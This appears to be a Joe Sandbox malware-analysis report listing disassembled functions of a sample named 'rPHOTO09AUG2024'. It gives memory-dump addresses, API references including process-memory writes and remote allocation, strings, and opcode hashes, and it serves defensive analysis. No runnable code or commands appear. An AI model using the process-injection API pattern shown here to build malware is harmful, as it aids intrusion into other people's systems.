Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 8d8647ddd2340c7b6c5e5b2d2e11bfc5d4a9f7907834eae870a565df7a69b459
Instruction ID: c823ce30069d318d027bcc5986eb74a7c37fe255b3a15e04aa27de4f319e70e5
Opcode Fuzzy Hash: 8d8647ddd2340c7b6c5e5b2d2e11bfc5d4a9f7907834eae870a565df7a69b459
Instruction Fuzzy Hash: 95F0B63400430AAFDB195F66EC0CB983BA6A701726F08C224F469951F1C73289E9DF71

Function 00DAC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DAC69D
CoCreateInstance.OLE32(00DD2D6C,00000000,00000001,00DD2BDC,?), ref: 00DAC6B5

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

CoUninitialize.OLE32 ref: 00DAC922

Strings

.lnk, xrefs: 00DAC631, 00DAC659, 00DAC663

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 932814a371eedddcb6a2dc77ccca7882dbcfcfad01902db66eeeebd6769773db
Instruction ID: 1d6a4755a77927d5c4f35f125b14788ea09fdb1741e1d618e2cf4b03e6e62d90
Opcode Fuzzy Hash: 932814a371eedddcb6a2dc77ccca7882dbcfcfad01902db66eeeebd6769773db
Instruction Fuzzy Hash: 7CA13C71108305AFD700EF54C892EABB7E8EF95714F04491DF196972A2DB70EA49CB72

Function 00D52E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00D60FF6: std::exception::exception.LIBCMT ref: 00D6102C
Part of subcall function 00D60FF6: __CxxThrowException@8.LIBCMT ref: 00D61041

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00D47BB1: _memmove.LIBCMT ref: 00D47C0B

__swprintf.LIBCMT ref: 00D5302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D52EC6

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: e766a508c1dee8e0d8d3449178498aa976c1e45e85113d1394996af888285bab
Instruction ID: 33b9e567cde20cc64477c05570ccccaf24dc55b11262fe0e307960bb3c5945b6
Opcode Fuzzy Hash: e766a508c1dee8e0d8d3449178498aa976c1e45e85113d1394996af888285bab
Instruction Fuzzy Hash: FB917E711083019FCB28EF28D895C6FB7A4EF95750F04491DF9969B2A1DB20EE48CB72

Function 00DABBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D448A1,?,?,00D437C0,?), ref: 00D448CE

CoInitialize.OLE32(00000000), ref: 00DABC26
CoCreateInstance.OLE32(00DD2D6C,00000000,00000001,00DD2BDC,?), ref: 00DABC3F
CoUninitialize.OLE32 ref: 00DABC5C

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

Strings

.lnk, xrefs: 00DABC08, 00DABC16

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: c7f7396b202e64cbe29474223d9a0e8d16cffa77657699fee8345bec08a5c992
Instruction ID: df31a3779fda921479f7f450a9d3d90f5de69dbea12b7e5a1a8672a1b9c09bf4
Opcode Fuzzy Hash: c7f7396b202e64cbe29474223d9a0e8d16cffa77657699fee8345bec08a5c992
Instruction Fuzzy Hash: 9AA15A756043019FCB00DF25C494D6ABBE5FF89324F148959F89A9B3A2CB31ED46CBA1

Function 00D6524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00D652DD

Part of subcall function 00D70340: __87except.LIBCMT ref: 00D7037B

Strings

pow, xrefs: 00D652B5, 00D652D2

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: ba416688ecc834eadfc22cc5a1fd7dd25715c17b54094d85c808256bc349ebfc
Instruction ID: c531952e485d30487ceaf0645d5e8bac2d7c38da731d626d6dbdf0cce298b0d0
Opcode Fuzzy Hash: ba416688ecc834eadfc22cc5a1fd7dd25715c17b54094d85c808256bc349ebfc
Instruction Fuzzy Hash: 7C517721A19601C7CB11B728E91137E2F94DB00754F68C99AE0C9863EDFF74CCD49ABA

Function 00D6023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00D60280
+, xrefs: 00D60277

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 42d9b969472c59f6d3336621760c9db9438fde1c9637cf0fb43f3657e0b45091
Instruction ID: 0c893900424d447a07e1e708eccb435c72808249e62a6ecfe1e7b391cbe589ce
Opcode Fuzzy Hash: 42d9b969472c59f6d3336621760c9db9438fde1c9637cf0fb43f3657e0b45091
Instruction Fuzzy Hash: B7512075104646CFDF26EF68E888AFA7BA4EF1A310F184065EC919B2A4D7349C46CB70

Function 00D562F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D563A8
_memmove.LIBCMT ref: 00D56446
_memset.LIBCMT ref: 00D5646A

Strings

ERCP, xrefs: 00D56313

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: ddef14f4e762db67d8977eb04fba3dfcea833abced7786cae4e12a187ebb0569
Instruction ID: 3162483f267f2b1bda4d087777ae3ca266a7df1a6cf1f099ec0972154ef68874
Opcode Fuzzy Hash: ddef14f4e762db67d8977eb04fba3dfcea833abced7786cae4e12a187ebb0569
Instruction Fuzzy Hash: 3E51C2719043099BDF24CF65C8817AABBF4EF04315F24856EEE8ADB240E771D688CB60

Function 00D99CD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA19CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D99778,?,?,00000034,00000800,?,00000034), ref: 00DA19F6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D99D21

Part of subcall function 00DA1997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D997A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00DA19C1

Part of subcall function 00DA18EE: GetWindowThreadProcessId.USER32(?,?), ref: 00DA1919
Part of subcall function 00DA18EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D9973C,00000034,?,?,00001004,00000000,00000000), ref: 00DA1929
Part of subcall function 00DA18EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D9973C,00000034,?,?,00001004,00000000,00000000), ref: 00DA193F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D99D8E
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D99DDB

Strings

@, xrefs: 00D99DF3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: fa6c1076d5d4abb8ed71ff82080e9b5ff883768b127b8ff20ea44a6c3f950fa2
Instruction ID: 7ec74454ab401409d6cae1410be56f52c9d95cde3bb6557269d9d2ed9e086130
Opcode Fuzzy Hash: fa6c1076d5d4abb8ed71ff82080e9b5ff883768b127b8ff20ea44a6c3f950fa2
Instruction Fuzzy Hash: 40413E76901219BFDF10DBA4CC91AEEBBB8EB09300F004099FA55B7191DA70AE45CF71

Function 00DC7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DCF910,00000000,?,?,?,?), ref: 00DC7C4E
GetWindowLongW.USER32 ref: 00DC7C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC7C7B

Strings

SysTreeView32, xrefs: 00DC7C20

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: aaf0e166e890b14e24cd66427ce0a029d2a4ac6efed75c702a7a8cec35da5d07
Instruction ID: 1effd7363427a6db4d708189284ccf69f3fa0c2051980d0bcc6610dade7fdf4d
Opcode Fuzzy Hash: aaf0e166e890b14e24cd66427ce0a029d2a4ac6efed75c702a7a8cec35da5d07
Instruction Fuzzy Hash: 4D318D31644207ABDB118F34CC45FEA77A9EB45324F284729F975A32E0D731E8519B70

Function 00DC7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00DC76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00DC76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC7708

Strings

SysMonthCal32, xrefs: 00DC769B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9793a01b4206851d372bdda609ae0d108001b613fbe17acfe77682d4f36e2caa
Instruction ID: 7ce4faeb4cbb6170401cd0501ac506072763318febc9554ea98117b3b8ee48f2
Opcode Fuzzy Hash: 9793a01b4206851d372bdda609ae0d108001b613fbe17acfe77682d4f36e2caa
Instruction Fuzzy Hash: F221D13254021ABBDF11CF64CC42FEA3B69EF48724F150218FE15AB1D0D6B1E8508BB0

Function 00DC6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DC6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DC6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DC6FDF

Strings

Listbox, xrefs: 00DC6F77

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 5dfa6a1cf2efac9767e62ca48768ece3f5b83caf3cc72b0a2299625795a0b36a
Instruction ID: 3aae36d06b6edae2b729d6c95745bd3a2e476250459a056e4e2f864ffabd477d
Opcode Fuzzy Hash: 5dfa6a1cf2efac9767e62ca48768ece3f5b83caf3cc72b0a2299625795a0b36a
Instruction Fuzzy Hash: 7E218032610119BFDF118F54DC85FAB37AAEF89764F15812CFA549B190C671EC518BB0

Function 00DC797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DC79E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DC79F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DC7A03

Strings

msctls_trackbar32, xrefs: 00DC79B8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c7e3564a6a3b2345f9d585f4e207480c2476307ca50205567b4bfc245ef4cde7
Instruction ID: 43c87f5c3805c93c9d6a2a4d2404bbd395f3cbf702b0f7075cd196e5a8579b27
Opcode Fuzzy Hash: c7e3564a6a3b2345f9d585f4e207480c2476307ca50205567b4bfc245ef4cde7
Instruction Fuzzy Hash: E0110132240209BBEF149F61CC05FEB37A9EF88B64F06061DFA45A3090D672D851CB30

Function 00D44C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D44C2E), ref: 00D44CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D44CB5

Strings

GetNativeSystemInfo, xrefs: 00D44CAF
kernel32.dll, xrefs: 00D44C9E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2b6d7fc9185e5f0910e94ec9cc9271c67aaa4d87a3663dd50c58de7522f47556
Instruction ID: 3c9c77bcfd5ed5141788a43df442b6baf9172494dbcd3d272913d1ca3f10e4fe
Opcode Fuzzy Hash: 2b6d7fc9185e5f0910e94ec9cc9271c67aaa4d87a3663dd50c58de7522f47556
Instruction Fuzzy Hash: F0D01271510723CFD7205F31D958B8676D7AF05751B19C83D9886D6250DB70D8C0C670

Function 00D44D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D44CE1,?), ref: 00D44DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D44DB4

Strings

kernel32.dll, xrefs: 00D44D9D
Wow64RevertWow64FsRedirection, xrefs: 00D44DAE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 51ec93875b31235555be23b5fe759cec617324abae931a9c10850ee748dc996b
Instruction ID: 46ade575a1b2c17c40d0a6b1157595900ddd8643968de63d27ca301105778034
Opcode Fuzzy Hash: 51ec93875b31235555be23b5fe759cec617324abae931a9c10850ee748dc996b
Instruction Fuzzy Hash: 05D01731950713CFD7209F31D808B86B6E6AF05365B19C83ED8C6D6250EB70D8C0CA70

Function 00D44D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D44D2E,?,00D44F4F,?,00E062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D44D81

Strings

kernel32.dll, xrefs: 00D44D6A
Wow64DisableWow64FsRedirection, xrefs: 00D44D7B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 77acbe109fc62152fff42874a38e83ee24bc8620f075ef6355bb17e819414c1f
Instruction ID: 46430df3732a80b79c26a3fad0d507035c168fbf004ac0afee854c4dabddf74d
Opcode Fuzzy Hash: 77acbe109fc62152fff42874a38e83ee24bc8620f075ef6355bb17e819414c1f
Instruction Fuzzy Hash: FDD01731910713CFD7209F31D808B96B6EAAF15352B2DC83E94D6D6250EB70D8C0CA70

Function 00DC1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00DC12C1), ref: 00DC1080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DC1092

Strings

RegDeleteKeyExW, xrefs: 00DC108C
advapi32.dll, xrefs: 00DC107B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 76364f7824677c1a54e49a29e69084bd877627ce9f5dadeb0ab8c875a3636c91
Instruction ID: 1b6ca8a31cc119f1989eb798b3601354654725deae233d84a5178f9e64a52521
Opcode Fuzzy Hash: 76364f7824677c1a54e49a29e69084bd877627ce9f5dadeb0ab8c875a3636c91
Instruction Fuzzy Hash: 26D0E235520723CFD7209F35D818A6A76E5AF06361B1AC82EA88ADA250E770C8C08A60

Function 00DB93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00DB9009,?,00DCF910), ref: 00DB9403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00DB9415

Strings

kernel32.dll, xrefs: 00DB93FE
GetModuleHandleExW, xrefs: 00DB940F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 69a4e763b659c75be06487ed11bfcdf73b3c4374ffea4b711b02d252d38108cc
Instruction ID: 4988fed63b3b1eb6281054ad195603c60b05068ba5f26db9821b310c83087d92
Opcode Fuzzy Hash: 69a4e763b659c75be06487ed11bfcdf73b3c4374ffea4b711b02d252d38108cc
Instruction Fuzzy Hash: B9D02E34500323CFC7208F30CA08A83BAE6AF00341B19C83EE587C2650E770C880CB30

Function 00D81B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00D81B42
__swprintf.LIBCMT ref: 00D81B73

Strings

%.3d, xrefs: 00D81B4D
WIN_XPe, xrefs: 00D81BB2

Memory Dump Source

